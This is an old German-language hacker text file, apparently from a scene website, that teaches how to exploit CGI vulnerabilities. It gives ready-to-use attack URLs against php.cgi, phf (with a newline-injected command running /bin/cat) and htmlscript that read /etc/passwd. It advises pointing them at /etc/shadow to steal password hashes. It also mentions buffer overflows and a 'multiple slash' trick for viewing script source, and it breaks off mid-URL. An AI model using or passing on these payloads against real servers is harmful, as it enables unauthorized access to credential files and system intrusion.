Wie nutze ich CGI Sicherheitsluecken aus ?

-------------------------------------------------------------------

written by FreakX for www.dark-angelz.de



Hi,



also CGI Bugs gibt es sehr viele und um welche rauszufinden kannst

du einen CGI Scanner benutzen ... ein paar bekannte Bugs waeren der

PHP, PHF und HTML Script Bug



PHP:

 http:///cgi-bin/php.cgi?/etc/passwd



PHF:

 http:///cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd



HTML:

 http:///cgi-bin/htmlscript?/etc/passwd



also die Bugs sind *sehr* selten und selbst wenn einer noch gehen

sollte, dann haeng statt das "passwd" lieber "shadow" ran denn heut-

zutage sind die Passwoerter eh alle geshadowed...



Sonstige Bugs koennen halt nicht so genau beschrieben werden da sie

script abhaengig sind ...



z.B. 'n Bufferoverflow, wenn das Script schlecht programmiert ist,

dann kann man dies halt ausnutzen um in einem HTML Formular z.b.

einen langen String eingeben, der u.U.nicht mehr vom Script intern

verarbeitet werden kann ... dann kommt es zum oben genannten Buffer-

overflow ...



-------------------------------------------------------------------

Ein weiterer Bug (aber ebenfalls schon eher selten) ist jener mit dem

man trotz gesetzten mode755 den Quelltext von CGI's bzw. Perl Scripten

anschauen kann ...



der "multiple slash" bug .. welcher folgendermassen funktioniert (oder

auch nicht ;-)



 http:////cgi-bin/